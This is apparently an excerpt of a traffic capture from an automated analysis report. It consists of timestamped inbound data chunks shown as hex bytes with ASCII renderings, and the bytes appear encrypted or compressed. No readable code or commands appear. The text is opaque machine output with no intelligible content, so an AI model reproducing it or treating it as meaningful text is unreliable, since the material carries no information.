e0 05 43 be 15 5b 28 22 5b d9 9a 40 d9 54 91 fc fa 17 3e e6 8e 26 fd bf 26 d0 d5 cf da b1 b8 8d c3 52 b3 d0 11 1e 0f 22 0b 3c 6e f8 d7 2f 5f 16 c5 1b 76 69 74 ac 44 72 95 80 ca 10
                                                  Data Ascii: ]9Ub?#Z=z-"Leup2O0laAsP{*dyrB>!j}8T2SBR4K&K)*O={}>c3pF1_3|NQO7^ld@M\C#Np<w.'8p/&@AoE_lK0[}C[("[@T>&&R"<n/_vitDr
                                                  2022-04-23 06:15:05 UTC1266INData Raw: e1 d7 69 15 c6 07 ac fa 09 83 f6 93 ca 18 f1 5d 6a cd ee a9 ab 86 e8 1b 18 4b 48 2f 1d 07 29 db 04 22 3a 2e 61 e8 79 54 eb f5 4e b0 90 1b 1c bf 09 6c 2e da ae f9 eb 64 5e 18 21 ce 51 2b 34 3c 5a 83 51 56 75 0e ce e8 6a 7a 7b 09 34 80 7d 65 0a 0f 02 12 a4 c4 19 21 6e 95 d5 de 1e bc 2b 7b c4 f7 6e 64 79 76 ba 38 f1 93 72 85 78 1b 50 3f d4 36 e5 70 c6 6b 92 fd 75 42 9e 5d ee ef 23 13 f6 f8 52 06 42 d2 cb 45 8b 6c 67 a6 96 fc e8 61 91 05 c0 0f 34 c7 89 ae f5 45 bf 17 dd 6d 28 2a 1a a0 a6 26 ae 24 a1 a8 92 29 e0 cd b3 19 cc bc 0b c5 82 77 3c 42 0d c5 eb 2c 59 ee 71 7c a7 c1 87 d9 46 bb 20 24 aa b6 37 fb 43 52 67 c4 cc ee dc 7c 7d 36 cd 1e db f9 c6 1f 35 54 c6 a5 a8 c9 ad 6f 50 ac 29 44 10 93 e4 9a d8 bf 29 76 91 75 96 3b 2a f2 ee 99 8c 60 4c 7c 3a 81 7b 6f 36
                                                  Data Ascii: i]jKH/)":.ayTNl.d^!Q+4<ZQVujz{4}e!n+{ndyv8rxP?6pkuB]#RBElga4Em(*&$)w<B,Yq|F $7CRg|}65ToP)D)vu;*`L|:{o6
                                                  2022-04-23 06:15:05 UTC1270INData Raw: dd 9e cb 64 6c 33 5c 4f 98 be ad 16 52 26 78 6f 53 5c 60 05 60 88 9a f4 4e 88 46 3f 54 8a fe 67 2b 90 fa 2e cc a2 51 f0 70 98 64 47 70 80 c1 48 36 db a1 71 6e 74 85 d2 58 fc 5d 5a 30 ac f9 1c 04 03 09 03 1e 1a 0c 92 f3 cc 9d 4b 0d 53 92 bb 13 e1 ac 76 b2 76 96 0b 4b d7 04 13 86 18 2a 88 70 b7 78 41 c0 14 d8 e5 17 02 d9 6f aa a5 aa d3 52 5d dc d0 24 28 0c d8 8a 22 a1 4b af a3 6f 4a 3b 02 9f 82 2e 89 43 8f db 38 cf f7 a9 4e f3 0a 5b cf 9b fc df 34 d9 68 fb 63 c5 73 88 b5 75 63 a8 cc fc 36 6f 96 98 a4 16 42 0f f2 c5 c1 65 2a 7d d5 de 42 8a ad a7 ec b0 43 39 d0 07 df b4 59 af c7 84 82 da 2c a8 8a 43 29 28 d6 49 d2 cf 49 82 27 a0 d6 e3 19 a9 c6 15 ea 53 e5 78 27 c1 05 83 af dc 33 33 8a c5 34 3e 1d 91 37 eb c8 7f c2 c0 82 1c 4e c6 07 25 c3 33 14 61 c2 d0 8f 1d
                                                  Data Ascii: dl3\OR&xoS\``NF?Tg+.QpdGpH6qntX]Z0KSvvK*pxAoR]$("KoJ;.C8N[4hcsuc6oBe*}BC9Y,C)(II'Sx'334>7N%3a
                                                  2022-04-23 06:15:05 UTC1274INData Raw: 2c 45 26 a9 b2 c5 55 33 ac af 1a 46 d3 79 c3 92 74 0d a8 d4 7e 4e 4c 50 63 c7 11 8f c1 d8 4d 16 1c 73 eb 79 99 a3 a9 72 81 e9 a3 7b 2e 76 77 69 b0 97 00 ca 27 23 82 38 ee d0 b5 4a cb 2f d6 3a 6b 72 02 3e 1f 0b 47 11 cd d3 a3 3a d6 d2 67 d7 f7 3c 95 63 4a d0 ce fe 8e e4 58 54 c5 a4 e7 fa fd 67 6d 35 86 56 1a e4 22 4c 1a 96 f8 f5 84 7d b7 e9 f9 43 e9 80 26 01 4f 8a 18 09 75 42 37 cf fb 0d db 6c a5 38 1c 4a 40 00 88 94 da 33 bf 0b d9 69 03 65 e8 16 9d ba a9 5f 24 29 a8 3c d9 5a 16 cc ca 9d a5 86 92 2e 4d ba ee f2 4d c6 55 ca aa 07 40 63 c3 2b f4 31 bc ab 79 38 00 76 b2 97 83 2c cb ab 05 db 71 14 37 6d fc 17 8a 6d fd 86 46 00 21 96 8c f6 4b 72 46 9c 50 06 10 00 fa 6a 0a c8 83 7c 38 e2 49 b3 79 a7 68 92 88 0a ea 4b cf 03 03 1a c1 91 e4 93 9c fc ca 72 5c a3 24
                                                  Data Ascii: ,E&U3Fyt~NLPcMsyr{.vwi'#8J/:kr>G:g<cJXTgm5V"L}C&OuB7l8J@3ie_$)<Z.MMU@c+1y8v,q7mmF!KrFPj|8IyhKr\$
                                                  2022-04-23 06:15:05 UTC1278INData Raw: 29 1e 35 d8 15 f8 97 f3 de 36 7c bb 26 a2 a7 3c 50 02 48 bb 4b ab d1 c7 9e 9a 9e 8b 38 f3 e0 c6 03 6f ef 86 32 45 74 a8 2f f7 82 fa c1 e8 22 31 35 ac 99 3b de 46 0c 63 15 12 54 d2 35 22 46 b0 3f ee a8 dc ff 5d 26 db 29 4f b4 90 4f 32 b5 51 6e 0c 91 85 b6 59 71 41 11 82 d2 8c 1c f8 64 7a a6 c6 28 56 a1 f8 9f 59 f0 11 96 47 29 dd fa db 87 89 ba b6 18 7c 54 b6 84 5d 1d 06 52 3b c5 70 81 68 46 b2 c8 96 88 63 b8 93 51 d0 e4 97 60 7a 8b c4 4e c0 84 ae 53 05 7e 68 07 ca a6 5b 2e 55 1c 68 8b 17 18 59 08 7c 86 c9 77 6e 73 8b df c5 5a 06 11 14 eb a3 60 c6 f9 ea 76 9c eb d0 c7 a1 e0 f3 ab 75 20 3f b2 5a e9 53 37 e8 03 b6 83 db 41 e4 67 d1 58 e3 30 bc 4a 4a ac f8 98 6e ab 23 5a 24 a6 18 40 e2 d2 ba f8 62 41 a6 02 40 66 31 5a 40 11 c1 e5 0d 3a b2 b8 64 3a 0d 1b 77 7a
                                                  Data Ascii: )56|&<PHK8o2Et/"15;FcT5"F?]&)OO2QnYqAdz(VYG)|T]R;phFcQ`zNS~h[.UhY|wnsZ`vu ?ZS7AgX0JJn#Z$@bA@f1Z@:d:wz
                                                  2022-04-23 06:15:05 UTC1282INData Raw: 9f 27 25 af 8d cf 57 60 bc d9 3e 8c ad 3b df 9e ad 56 54 73 e0 e7 52 55 24 e4 a7 9e 16 be aa 3a 98 73 da 07 e8 42 7c e1 dc 48 6d 4c 73 8b e0 58 e4 31 3d 46 2b f7 3e fc 07 13 bb 87 8f 52 2d b3 0c 02 42 7b f1 d7 47 4e 9a a7 c5 e3 a1 c4 6a 46 55 a5 35 87 bc cd 6a 9f 8d 61 bf 33 ec b8 b9 3b ba b2 04 2e ec 80 86 b3 be 3e 1a 8d f3 84 9e df 8c 91 8d 1c 13 c0 52 36 28 55 ee 95 31 4a 14 fa 05 fb 27 01 8c a1 9d 89 ad 14 70 6b da 87 ce ca b5 6a 39 b0 49 22 c7 ea fd 1e 06 4d d4 22 c7 6c 9b 68 09 04 2e 63 ac e6 81 bb e0 05 c8 fd 4d 8e 79 c4 13 66 e8 5b 77 99 ef db 7e cb 05 a9 2e a5 3a bc d6 aa 70 c0 d9 5a 51 b1 be ec 71 c8 a8 d2 7f 8a 9d e0 2e 78 ed ab 62 f0 86 e2 be 44 ad 1c 8c 66 33 c0 d3 68 dd 28 9a 17 2a 13 aa 2b b4 71 62 9b ee db 0b 76 87 2e 3f 93 4e 9e d1 01 c0
                                                  Data Ascii: '%W`>;VTsRU$:sB|HmLsX1=F+>R-B{GNjFU5ja3;.>R6(U1J'pkj9I"M"lh.cMyf[w~.:pZQq.xbDf3h(*+qbv.?N
                                                  2022-04-23 06:15:05 UTC1286INData Raw: d9 73 cc ed 37 0d b1 c7 88 16 8f 51 38 f1 94 fb e7 47 f2 e7 cd a3 bc 25 6b 89 de 0f f9 ca 27 7d 0b 48 ac 52 8d 4f e0 05 ed 90 21 ff e6 16 87 d5 4c fb 9c 1e ca 54 91 84 14 e1 f2 4b 92 89 5f 36 85 1b 80 f3 34 b4 bc a3 ca 5e 36 05 58 b6 05 73 35 b6 be 0a 6d fb d7 4c 2e 9e 17 fa f6 ea 6d c3 0b e5 0a 17 15 96 10 85 b2 13 79 99 b9 0a 0f d6 28 04 d4 d7 33 f8 16 a2 ee 46 ca 16 74 8e b4 3a e6 2b 85 98 5f 17 95 ee 65 7e a0 f2 42 58 37 79 77 24 fe d4 25 d6 1b 38 59 a0 25 9c 1e ad 98 0e 3f 95 ac 8d 6d 08 99 59 40 f1 7a dd 8b c2 6b 94 fe 83 4f eb 02 8a f8 13 6c bb 8f f4 d8 9a 15 5d 99 cb ff d2 ce 6b 6d ea 47 bd 02 5b fa 8c 9b 43 37 4f cf ca 71 e7 bb 07 9f 9b 2d 5a 15 94 b4 b3 9c 6f fb 5e 3c 8e fb 36 cc 9c e7 35 76 0d 76 b7 e7 26 45 58 55 3c 65 e8 b2 31 d3 76 ea 75 4d
                                                  Data Ascii: s7Q8G%k'}HRO!LTK_64^6Xs5mL.my(3Ft:+_e~BX7yw$%8Y%?mY@zkOl]kmG[C7Oq-Zo^<65vv&EXU<e1vuM
                                                  2022-04-23 06:15:05 UTC1291INData Raw: b8 b0 cd 8d 5f 10 f6 df cc 40 40 43 69 8e 72 06 40 13 7d 22 4d 01 39 d3 21 f9 13 08 9d f3 64 b9 f0 c2 f8 c4 53 f9 69 ab 7f f4 de 5d d4 8f 05 5f f1 ca f4 c2 f4 f9 37 f5 bc ba ec fd 8c 94 a9 ec fe d6 41 11 73 b9 9a ab 72 fc 74 0a 5a 0b e4 47 da a3 ca 11 e2 dc 3f b1 25 0a b4 68 11 c9 c4 49 ab 50 8b aa 25 9f da a8 56 4e d0 16 09 dd 9b ee 9f cf d3 8e 7c aa 6f f9 7b 16 0d 02 2b c5 36 8c 3c de 5a d6 1a 11 45 bc 9d eb f9 1e cd e2 73 d7 9d c4 a5 c1 eb 4c fe 44 f3 06 6a 06 a0 13 1a 46 66 15 28 2d 9b 78 72 91 02 b6 43 93 7e 95 cd cb 8f 71 59 3c 22 25 e4 b2 24 1e 37 5f b2 2d 2c 1e 33 e8 28 cc cf 34 8b a8 9f f6 5d fa de 21 1d 1f 3d a2 5a 11 04 6c 2f f9 17 69 1a e7 e2 95 3d dc 1a fe 6b 15 5c 61 77 c1 51 f7 63 05 bf 68 2a 55 9e 68 ea 83 a1 9f 08 a4 19 02 dc cf df 3d a1
                                                  Data Ascii: _@@Cir@}"M9!dSi]_7AsrtZG?%hIP%VN|o{+6<ZEsLDjFf(-xrC~qY<"%$7_-,3(4]!=Zl/i=k\awQch*Uh=
                                                  2022-04-23 06:15:05 UTC1295INData Raw: ae cf 3c 60 3a 47 86 8d 2c 0e d3 26 ad 2a b7 43 51 09 1e 94 11 0c df f4 8e 04 a1 60 90 99 fa 00 72 a0 2e 57 58 ff 4f 40 66 5f 5c 68 43 1b b9 83 d3 2b 30 7f f2 33 6a ea 65 64 74 94 95 d1 8e 64 ac 1d 06 5c 3e 71 0f 44 ea 6d 44 0e 22 68 2c 30 b5 25 18 af 2f 85 0c e2 d3 82 d6 51 6b fb 93 e6 63 70 71 b5 31 70 9b 7d 4f 0c ce d1 e9 48 74 f8 a0 e3 19 ed fc f6 0e 33 5e a8 ce 17 ba 44 61 f9 00 9e 91 34 d6 5a 13 9a 18 50 1e 85 96 a3 52 b0 04 d4 f9 88 3c 83 93 07 e1 3b ee 7d b6 07 4d 8b b5 93 3a 81 d7 5a 93 7d a4 98 59 a8 13 05 ce fc df 00 ed e9 83 e7 18 25 09 96 e8 02 aa bc bc 06 ad b0 19 a8 d5 48 a8 9a 82 8f 40 28 2c c1 5a 1c e5 72 d3 67 64 f0 46 10 03 07 72 58 5c c0 a5 70 20 c5 36 57 31 94 6c 6d f6 eb 20 1e a7 e3 d0 a4 59 97 2c 2c 7b 5c 8b b5 fa f7 c6 0d ef 17 eb
                                                  Data Ascii: <`:G,&*CQ`r.WXO@f_\hC+03jedtd\>qDmD"h,0%/Qkcpq1p}OHt3^Da4ZPR<;}M:Z}Y%H@(,ZrgdFrX\p 6W1lm Y,,{\
                                                  2022-04-23 06:15:05 UTC1298INData Raw: 85 6a e7 8e 57 ad a4 32 00 26 09 26 52 82 0b 68 7c 64 fd 7d 32 ed 90 6d b6 64 e3 6a c5 54 93 8d ce fd 57 60 d6 3f d2 a1 43 bf 0b 71 60 e1 0b 03 2a 67 48 6c bd 73 99 4b 35 28 26 c7 42 b4 0a 5b d3 f9 2a 4a 4b a7 77 3c 34 b5 39 a8 90 1a 20 d4 68 48 52 a3 e7 69 89 5f aa ed e0 e2 e6 a0 55 b9 8c 09 6b 39 f6 29 2c ce 11 de d2 3f bf fa 4d 36 40 4f 87 6a 10 4a 84 0f e1 85 6c 6a 13 43 f3 28 df 30 81 b7 5f da 60 4c 86 37 22 77 cb 24 90 d1 36 7c 3b c4 37 19 34 9d c2 89 b6 b1 cc b1 f8 a7 c7 ea 30 ad 0e f0 05 91 6a d2 60 dd 9d f0 e6 10 02 f2 f9 bc 71 b1 84 4d d0 88 03 10 49 5a c5 b1 47 95 74 d2 6a ec c1 1d 4f df 0d e6 74 c8 e4 98 cc 3b da 83 45 69 19 7b 60 bf 40 bc da e0 9b 31 6f 4e 47 cf 85 84 73 76 93 99 0f 5b a8 37 70 04 80 80 a5 83 4c 38 66 f2 50 24 9b eb 2c aa e0
                                                  Data Ascii: jW2&&Rh|d}2mdjTW`?Cq`*gHlsK5(&B[*JKw<49 hHRi_Uk9),?M6@OjJljC(0_`L7"w$6|;740j`qMIZGtjOt;Ei{`@1oNGsv[7pL8fP$,
                                                  2022-04-23 06:15:05 UTC1302INData Raw: db 0e 01 2d 0b e9 b5 e8 a7 4d 7a 12 07 62 2c 0f 37 d2 89 4b 24 89 27 6f 55 42 18 c6 36 cc 1d c3 1f 59 b8 3b 5e 67 a4 f3 32 4e 99 b3 61 37 7f b7 b8 d9 48 79 91 05 6f bf dd 6b 37 ea 9d 22 84 03 00 b4 8d 88 01 dd 93 54 ec ce e5 88 6d 4e 7b d2 f2 c4 89 25 b3 5d c3 12 fa 38 d1 b2 30 2c ea 04 3b c6 e4 ba 3b 90 97 eb 52 a9 27 19 82 d0 95 1a e3 0c 93 85 38 e2 ac e7 3c 50 c7 81 4a 44 41 ef 78 e3 0a ee d3 c3 48 aa 47 83 a9 ff a7 2b 27 9c be a4 3e ee 23 30 02 40 b5 a5 73 7c 38 34 6f b3 b7 1f 5e dd e8 a3 0b 8e f0 3a 3b c6 13 b1 18 b1 b2 4a ce e6 18 38 de 8d 55 d8 0d 96 ca 6d 8b 0e 78 ad e4 1c a1 9b 7a 8c 9c ce c1 ee 7b a3 f2 c6 b7 eb 5e 81 f4 74 93 88 7a 8a 9f 82 b7 f6 db 8f 34 9c ce 4c aa d8 ec d7 96 dc a1 d3 53 a8 8b e2 be c7 23 08 30 5d 97 8b 82 78 85 f9 87 31 18
                                                  Data Ascii: -Mzb,7K$'oUB6Y;^g2Na7Hyok7"TmN{%]80,;;R'8<PJDAxHG+'>#0@s|84o^:;J8Umxz{^tz4LS#0]x1
                                                  2022-04-23 06:15:05 UTC1306INData Raw: 4c c4 0e ad b7 43 aa 10 da b7 3f d8 0d 68 3d 61 8f 9a 85 3c f9 0d 96 e0 cc e7 d1 6b ab 22 73 41 70 4f 77 74 73 bf 61 18 37 5a 25 b4 eb e6 21 cb a1 a5 d4 82 6b 17 45 bb 24 52 9f 3a 8a 27 61 70 ea c4 ad 3c f9 84 e3 ee ff 80 ec 53 c1 ca 7f 0a 5d 7f c7 30 35 24 d8 55 95 ee 33 a3 94 4e 03 49 87 25 0d 84 37 3d 87 4e cc 41 7d 01 1a b7 b7 4e 45 ed 0c 5c 04 75 eb ee 66 69 96 1a 53 83 66 b0 ae 1b b3 80 c3 52 69 81 d3 fa 49 8a 01 47 c3 d5 0e ba 3f 8a 45 4d 48 40 f6 e9 c3 ab 8e 7a 0f 44 88 e8 ff eb 00 4f 82 7c 01 32 29 68 ab 95 ce 06 f9 66 ce 0e 5f 5e 5a 29 37 6b d1 52 37 4b da 57 36 ae 8b 80 0b db e1 c5 2f 59 48 30 a7 f6 42 cd 27 13 de 84 60 9a 79 a8 ac ab 11 f2 92 11 e2 a7 d5 31 02 6e d6 a9 c9 4f 90 2a 09 ca a9 45 6a 41 66 63 2d ac 6f 22 6f 42 5f c7 60 26 ed 3d f1
                                                  Data Ascii: LC?h=a<k"sApOwtsa7Z%!kE$R:'ap<S]05$U3NI%7=NA}NE\ufiSfRiIG?EMH@zDO|2)hf_^Z)7kR7KW6/YH0B'`y1nO*EjAfc-o"oB_`&=
                                                  2022-04-23 06:15:05 UTC1310INData Raw: f7 fe a3 44 54 4e 16 83 e6 41 5a ab 89 a9 ee 7c 63 22 c5 bc 64 ce 27 e1 1c b6 c9 b1 e7 62 07 3c 6b 26 43 5a 0b 2e 82 12 cf 55 2c db b7 eb 9b 97 4b 45 34 97 71 10 55 c6 17 a8 0e 42 6c 4b b9 c5 b7 f0 7e 21 8b b8 00 b9 cd 8a 66 8c ad c6 da 1b c1 91 37 a5 e6 9e 2e 57 0e da f1 cd b6 dc fd ad bd eb 83 f5 24 e4 17 02 fe 6a 93 88 7e 57 8b 98 4e fb dc 71 02 27 c3 a5 2c 5e 21 59 44 c8 ea 55 f1 88 bc 20 b0 a4 2d e2 97 ea 4c 9d d4 19 bd 56 9a 9d aa 45 44 f6 e7 b8 3f 6a 33 8e 46 36 f0 f5 20 5d d2 fd 6d 7b ea 9a b9 41 0e 03 0a 4f 56 21 27 2e 92 9c 39 b7 ff 1a d6 87 15 25 10 aa e6 cf a9 63 b2 1a 0e 26 2e 75 2c ce 28 dc d5 82 f6 45 b9 6d 0e 54 09 08 89 7c ba 84 89 53 42 ff cc 41 85 ae e2 ba 6c 5b b9 a9 be aa fe 6f 87 fd 8c 86 dc 04 b7 c7 15 a9 0a f9 78 61 e6 93 0e e6 2e
                                                  Data Ascii: DTNAZ|c"d'b<k&CZ.U,KE4qUBlK~!f7.W$j~WNq',^!YDU -LVED?j3F6 ]m{AOV!'.9%c&.u,(EmT|SBAl[oxa.
                                                  2022-04-23 06:15:05 UTC1314INData Raw: a9 1a d5 43 f2 7d 4f 36 d4 cc 5b ab 6e b5 90 a1 48 c5 b4 88 49 05 f4 66 70 f6 90 ae d2 3d fd 95 3e ff 8e cc 60 9d 41 8e 59 a9 88 66 c9 dd c8 31 12 af 4e 1c cc 69 1d 03 1a b4 c7 10 5a de e0 8a 05 80 ec 2b c8 23 e4 b5 e4 2b f1 7f 27 fa 54 1e ed 40 36 c3 94 16 04 62 9f 4c 3a 98 0c 2c b5 cf 6c e0 0c 2f ba 98 d3 ea ca 37 1e 52 63 4a e0 17 1d 1e 00 25 93 51 4d 1b 02 9a f7 d8 ab ab 80 04 20 39 b7 45 ac 31 92 6a 60 f0 f6 9c 88 a8 2e aa 83 8a c5 c9 bf 5e 52 3e 15 f9 8f 34 cc b1 5e a0 aa fb af 67 5c cd 35 9c 03 20 cf 9a ec d8 95 af d1 78 b1 20 b2 70 ea fe 0b 9a 02 eb 4f 36 17 d5 06 10 69 85 4f fe e4 f7 dd 7a 6a 0a 88 23 ff 41 cb 36 11 c7 f4 04 22 58 1d 37 82 b1 17 fc cd 76 81 8b f2 17 62 b3 02 d1 14 6a 21 85 05 91 6a 64 20 16 43 27 66 92 18 cd 89 68 29 e7 8a ca c2
                                                  Data Ascii: C}O6[nHIfp=>`AYf1NiZ+#+'T@6bL:,l/7RcJ%QM 9E1j`.^R>4^g\5 x pO6iOzj#A6"X7vbj!jd C'fh)
                                                  2022-04-23 06:15:05 UTC1318INData Raw: 22 d4 fa dc 2f 81 f1 4c af c8 d5 53 54 db 36 eb 33 05 d4 40 db 55 e6 a0 91 0b 12 1e 41 96 b9 93 17 e7 e1 26 09 23 24 77 73 87 a9 e5 a0 31 e2 88 97 7c ba e6 28 8b ea 1d 4a ff 3c 07 15 fe 90 fb 3d 0c 68 5b c8 24 00 00 ff 8a fa 0a ca 3a 40 64 00 eb 35 f6 2f 54 3b b5 ea 35 d6 5e d6 b8 dc 71 3d 43 3d 99 9a 1b 4a 0e fa f1 63 09 b2 f1 c5 ad 36 b8 6a 41 b2 29 92 32 68 53 ed 3c 17 d4 15 49 26 2c a4 d5 30 52 ce de 5b 39 d9 3d 05 64 38 da 16 d9 a9 2a 88 75 76 5a 81 08 b9 18 43 7d 4a 33 5c 49 a0 67 53 30 83 9c bb 94 db 01 8a 74 2a ae a7 50 e1 66 96 d5 75 3e c5 cc a8 d8 95 b6 94 d0 ca 54 fc c3 59 df 3a dc 23 f2 ac 08 5d 38 d4 fb b2 4c e6 ee 58 2f fc a7 4e ba 7b 5a e8 6f ac 9d 66 c3 d4 01 41 c9 26 26 00 19 88 31 a4 80 25 89 fd e7 9c f9 1c c9 b0 33 52 a4 51 d2 33 cd e6
                                                  Data Ascii: "/LST63@UA&#$ws1|(J<=h[$:@d5/T;5^q=C=Jc6jA)2hS<I&,0R[9=d8*uvZC}J3\IgS0t*Pfu>TY:#]8LX/N{ZofA&&1%3RQ3
                                                  2022-04-23 06:15:05 UTC1323INData Raw: 14 00 d5 07 4c 45 91 27 f0 fd e8 51 51 81 62 4b 94 dd c0 81 3d 16 11 50 41 a0 00 b9 71 db d0 55 0b a2 30 d1 30 31 a3 7b 04 f1 ab 42 92 75 87 88 c5 e2 8e 71 27 01 f1 a1 19 52 70 8b 88 fb a6 45 1c f5 ea 9b 83 22 48 f5 19 8a 45 ee fe fa 50 bc f6 13 68 97 78 ba d6 f6 fd 8c ee eb b8 01 eb bb 29 e5 bd ee 55 38 e1 39 d6 99 30 45 42 37 55 1c 34 05 59 9f 93 7a e5 7b 28 21 ed 82 d5 f2 5f 78 aa d2 99 9f 04 6c 09 54 99 0a ac f4 ac 04 25 57 0b 14 a9 9e 0c c0 8c e2 f5 3e 69 78 13 57 0a 9e 9a b7 ce 65 11 4e b5 a1 12 8a 8e 3b c1 5e 79 b0 b6 97 4e 58 a8 4e 0d ce 18 9c 8a cb 5a 5d 3c 25 79 2c c5 9f 46 75 ba 63 cd 65 f1 be a4 5d 51 25 f6 a4 2d f1 71 63 3f bb 03 e2 98 8e 15 65 18 71 a8 37 31 f7 45 39 92 25 86 71 81 4e b6 61 56 71 91 79 80 c3 45 21 ac 77 d9 71 c5 a7 dc 36 ee
                                                  Data Ascii: LE'QQbK=PAqU001{Buq'RpE"HEPhx)U890EB7U4Yz{(!_xlT%W>ixWeN;^yNXNZ]<%y,Fuce]Q%-qc?eq71E9%qNaVqyE!wq6
                                                  2022-04-23 06:15:05 UTC1327INData Raw: 68 25 3d 89 27 3e 90 23 0b 20 cd 68 96 d8 a6 b7 15 92 c5 bc 9d 54 ad ea 8d ba 27 85 06 57 88 e3 00 23 e3 f8 c7 a5 16 79 b0 dc 87 be 0c a0 d2 9f 9b bb c4 d0 33 7b 60 e9 13 21 47 02 b8 52 36 5a 56 0f ad 06 d2 5c 21 15 98 dc 14 c5 c2 8e e3 7a dc ae 1b 6a 85 74 57 59 f6 0c 05 47 9e c4 bc 2d d8 fb 56 a4 1c 50 22 10 66 50 20 77 e8 63 56 a6 89 04 6e 43 4f 25 71 49 13 e4 d7 7c e4 92 54 e9 88 4d 9e c1 46 bf 54 ea a1 72 0d 8c d4 74 4c 71 9e 47 91 15 ad 8d fc 68 b9 3e 4c 10 8e df 4e 65 69 ec ca 59 e2 1b ea f0 8e dd 14 85 3e db e3 0c 83 02 9a 3a 30 ae 0a 90 41 de 0f 47 3c c9 fa c4 6e 79 72 44 6c b7 9b df c0 fc 36 0c 61 dd 20 b3 f2 6c a9 1a cd 23 86 17 96 0f 06 4f df 57 9e 3e da 0d 35 a3 f2 90 c9 f2 7a d2 ac bf 5b 48 54 8c 94 c0 c4 9d 45 50 1f be 84 c9 e4 d5 79 18 2b
                                                  Data Ascii: h%='># hT'W#y3{`!GR6ZV\!zjtWYG-VP"fP wcVnCO%qI|TMFTrtLqGh>LNeiY>:0AG<nyrDl6a l#OW>5z[HTEPy+
                                                  2022-04-23 06:15:05 UTC1330INData Raw: fd 2b 39 4b ab fe 25 8d 75 1a ea dd 8e 35 b5 c9 a3 41 71 81 ed f8 79 00 32 73 a7 a5 df c7 17 3c f4 dd f8 37 7e 70 d5 3b 21 05 87 97 4c 60 88 a4 be 49 2f 77 a7 d2 41 44 e3 0d d2 3f 64 ba c2 b9 21 78 70 46 44 71 b3 34 b6 3c fe 34 4c ab ea 1d e8 7b ec b3 6a 36 6a 8c 74 11 cf 1e be fa 7b 50 9f 4b 78 6d f2 c8 25 f8 f7 1e d9 84 28 b7 5f 89 6f b2 56 dc 72 66 42 df 49 cb ff 87 9a 80 39 d3 d1 9f 11 e2 2e 43 fd 70 b4 15 c9 32 dd 39 5d ca a7 bb 75 81 64 c7 88 8a bb ca a6 30 c5 e6 d6 e8 bc 2a 9c ad 8b bd 79 6a b7 3b 08 14 ce fd df 5a ec 72 bb c6 9b 7b 7f 1a d1 ac 74 74 5f bd bc f4 96 16 e5 e9 e4 4f 0b e7 53 74 12 f8 01 d0 17 cd 39 88 77 9b b3 c8 15 38 28 6e b7 eb e7 2a fc b2 f4 f5 5d f8 c3 2c a5 8b eb d1 44 05 17 07 1c b5 99 82 07 bd cb 2f 63 f7 0a d8 45 a4 17 98 a3
                                                  Data Ascii: +9K%u5Aqy2s<7~p;!L`I/wAD?d!xpFDq4<4L{j6jt{PKxm%(_oVrfBI9.Cp29]ud0*yj;Zr{tt_OSt9w8(n*],D/cE
                                                  2022-04-23 06:15:05 UTC1334INData Raw: 1f 97 1c d9 62 29 65 65 43 85 41 1e b9 2b 9f 8c 3d c9 08 e3 81 92 e9 d4 00 9d a9 f7 c6 b0 03 ea 96 7b 1e 49 5d b7 02 17 69 5a 63 bf 12 db e3 d0 2a ea 98 6e 31 15 aa b9 af 8c 4c 77 39 e0 38 f9 6c 6b 64 43 49 60 f0 7b 45 c7 9b 4a bb ed d4 4f 8c 46 c9 c8 11 eb b0 ae 9b a5 54 0f 9f 6e 52 da bc 58 4c 51 fc 3d 4f 9c 58 88 3e 6f a0 54 62 3e 57 94 3b 55 d9 66 23 55 0b be 8e 52 9f e2 bb 33 ab 4e 43 e0 f3 7c 8c c4 05 4c c0 b7 79 83 01 e4 a7 96 f3 41 bf 22 1b ae 09 53 34 3e 7d bc 34 b0 ec 80 b6 7d 95 81 be d9 39 b7 e8 2b 1b f0 3c 16 a1 df 2e ff 74 92 ed 70 4f aa 01 71 a3 6b 15 49 3d f2 47 42 5d bf 83 02 12 c0 9a 7d 0d 2a 74 64 ea 02 69 df b9 21 1a 42 6d 60 93 a1 e4 2e f0 d2 c8 4a 4e 72 2c ae 78 54 f7 1f 68 7b e8 96 1f 84 3e 36 d6 50 aa be 15 6b 6a 68 91 14 f0 c6 84
                                                  Data Ascii: b)eeCA+={I]iZc*n1Lw98lkdCI`{EJOFTnRXLQ=OX>oTb>W;Uf#UR3NC|LyA"S4>}4}9+<.tpOqkI=GB]}*tdi!Bm`.JNr,xTh{>6Pkjh
                                                  2022-04-23 06:15:05 UTC1338INData Raw: 00 d3 85 76 12 75 67 5c 5b 95 48 5c 64 8a 62 c8 b9 fc e9 03 c0 e9 95 38 6a 56 ff 5c 06 e3 7a 22 18 8f 59 e8 81 29 cc 49 b2 b7 b5 be df 76 5c 9d b8 c3 f4 c4 a8 a4 d5 34 f6 90 c7 d6 0e 1d 79 b6 98 7c 7c 1a a0 e4 f6 65 28 49 92 85 4f cc 55 93 fc 18 0b 84 70 4d 08 47 68 5e 0c 8a c8 11 ad 5a 3a c3 25 b6 df af 1f 67 ce ff 6b 00 12 6b ac 60 78 7b 5f dc 4a 98 5e 4f 2e 93 2e 91 f6 bf 44 fe a5 64 5e 84 78 ea e9 cc 64 75 79 f0 a6 c0 1b 11 28 86 24 64 d4 4c 70 5e 3f e9 6f ce b6 5a bf a2 bf 3e 21 dc 53 d3 ec 05 2f 29 ea 42 b3 63 c6 02 74 5d db 50 a3 5d 2e 3f 1b cb e2 7e cb 75 38 de 42 74 3b 73 06 6b 7b 18 43 f1 06 32 f6 14 c4 99 78 46 b8 41 60 b4 e3 65 fd e6 1c 31 48 4c 27 79 9b ac 1a f7 1e 55 39 56 43 2e e0 55 15 7a 9a e8 5e 7a e8 f7 8d 22 5f 93 b6 85 84 80 93 a5 ba
                                                  Data Ascii: vug\[H\db8jV\z"Y)Iv\4y||e(IOUpMGh^Z:%gkk`x{_J^O..Dd^xduy($dLp^?oZ>!S/)Bct]P].?~u8Bt;sk{C2xFA`e1HL'yU9VC.Uz^z"_
